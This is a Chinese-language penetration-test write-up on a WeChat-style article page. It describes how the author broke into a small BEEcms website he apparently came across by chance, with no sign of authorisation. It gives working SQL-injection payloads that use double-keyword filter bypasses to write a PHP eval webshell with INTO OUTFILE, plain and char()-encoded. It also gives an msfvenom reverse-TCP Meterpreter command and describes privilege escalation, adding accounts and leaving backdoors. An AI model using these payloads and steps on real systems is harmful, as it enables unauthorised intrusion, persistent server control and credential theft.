服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

实战 | 记一次某小网站的渗透过程

日期: 来源:潇湘信安收集编辑:Deilty
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


现在只对常读和星标的公众号才展示大图推送,建议大家能把潇湘信安“设为星标”,否则可能看不到了...!


0x01 前言

记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。

0x02 渗透过程

1. 无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索beecms这个cms,发现有通用漏洞。

2. 这里运气比较好,没有更改后台地址,还是默认地址/admin/login.php


3. 通过通用漏洞发先后台管理处存在sql注入漏洞,直接输入admin’,然后就会报错,这里用万能密码不能登陆,看来还是得通过上面得通用漏洞来进行注入


4. 可以看到输入payload后,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过


5. 发现这个注入点后,就有各种各样的注入方式了,通过sql语句写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看看那种方法可以


方法一

1. 通过post抓包sqlmap一把梭,dump出管理员账号密码,进后台找上传点


2. 一把梭,发现并没有,使用脚本也没有绕过


方法二

1. 通过burp抓包,写入一句话,发现写入失败,前面讲到有防护,这里通过hex编码或者char函数绕过,payload:
admin%27 un union ion selselectect 1,2,3,4,<?php @eval($_POST[123]);?> into outfile 'xm.php'#

2. 对shell部分进行编码


3. 写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x,看到可以写入成功。


ps:这里的写入路径纯属盲猜,运气好,默认目录


4. 用蚁剑连接,成功连接,至此getshell完毕,下来就是后渗透阶段,后面会讲


char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串,payload为:

admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

一样成功写入


1. 写入成功后,菜刀可以连接,我们访问写入的文件,惊奇的发现竟然有admin,和一串md5码,大胆猜测可能是后台账号和密码,试一下


2. md5解密,wocao,成功登陆,然后就是后台找上传了


0x03 后渗透

通过whoami查看权限,发现是admin权限,但是不是最高权限,我们要提到最高权限去


方法一

1. 通过msf生成木马提权
payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe


2.通过蚁剑上传木马,并执行。执行之前打开msf使用模块use exploit/multi/handler,设置相应参数,然后开始监听


3. 不知道什么问题,用这个没有成功,那么只能通过大马提权了


方法二

1. 上传大马,此处应该有狗或者盾之类的,用的免杀,成功上传

2. 访问大马


3. 这里提权方式很多,就不细说了,有大马之后很多操作都可以引刃而解了,开放端口,添加账号,留后门。。等等

4. 创建admin权限账号之后,登陆服务器


0x04 一些其他的发现

通过扫描目录,还发现有phpmyadmin,可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell


0x05 总结

1. 前台sql注入获取用户名密码,进入后台找上传

2. SQL注入语句写入一句话
3. phpmyadmin一句话getshell
4. 上传大马提权

文章来源:CSDN博客(Deilty)原文地址:https://blog.csdn.net/qq_42111373/article/details/105667190


关 注 有 礼



关注公众号回复“9527”可以领取一套HTB靶场文档和视频,“1208”个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“2191”潇湘信安文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。
 还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读





相关阅读

  • Java 微服务随机掉线排查过程

  • (给ImportNew加星标,提高Java技能)背景我们的业务共使用 11 台(阿里云)服务器,使用 SpringcloudAlibaba 构建微服务集群, 共计 60 个微服务, 全部注册在同一个 Nacos 集群。流量转
  • 当你遇到一个合适的人,你会发现:

  • 文章转载自:独体编辑部(dutibianjibu)作者:老汤姆嗨,我是小熊妹,今天转载一篇文章,作者是男生,大家阅读愉快~说来惭愧,曾经在大学的时候,我的口碑比较糟糕,谈过比较多次恋爱。最后一
  • 一句话证明你参加了225联考

  • 又是一年省考日今天赶考的各位同学发挥如何?觉得考砸了也没关系哒根据谈妹的观察多数最后上岸的人笔试后都抱怨自己发挥得不够好不到揭榜那一刻你怎么知道自己不能成为那个分
  • 一句话描述你的社恐

  • 来源:一周文案(copyweekly)“一句话描述……”是一个很有意思的内容,也是一种很好的写作练习。它的基本方法就是:尽可能从生活的不同维度去发现和创作;尽可能做到描述、展示,而非形
  • 实战|记录一次通过不断FUZZ从而获取万元赏金

  • 0x01 前言下午,一个老朋友发来一批资产让我找个有效漏洞,原因是厂商弄活动,提交有效漏洞可获取其奖品,那个奖品对朋友很有吸引力。0x02 漏洞背景一个后台系统,称其为https://mana
  • 道达尔三年两个世界级发现,不服不行

  • 文:清泉2022年,在高油价和保障能源安全供应双重因素激励下,全球油气勘探开发投资大幅增长。虽然全球油气发现的数量有所减少,但呈现出发现储量大幅增长的特点,新发现平均规模创近

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 实战 | 记一次某小网站的渗透过程

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • 记一次bypass前端验证+后端缺陷

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • MSSQL弱口令绕过某数字上线

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • 收藏!Web安全漏洞靶场库集合

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • Spring环境下有关内存马的回显总结

  • 0x01 前言在学习各种内存马的过程中,关注到了观星实验室的一篇文章,较为全面的列举了在Spring环境下的有关内存马的实现技巧这里我们深入进行学习学习一下0x02 正文前景回顾网
  • 初探 | 冰蝎流量免杀

  • 0x01 前言冰蝎4.0发布以后,可以自定义传输协议了,也就是我们能对流量进行改造,本文依据rebeyond大佬文章对冰蝎流量进行改造,记录一下踩过的坑。https://mp.weixin.qq.com/s/EwY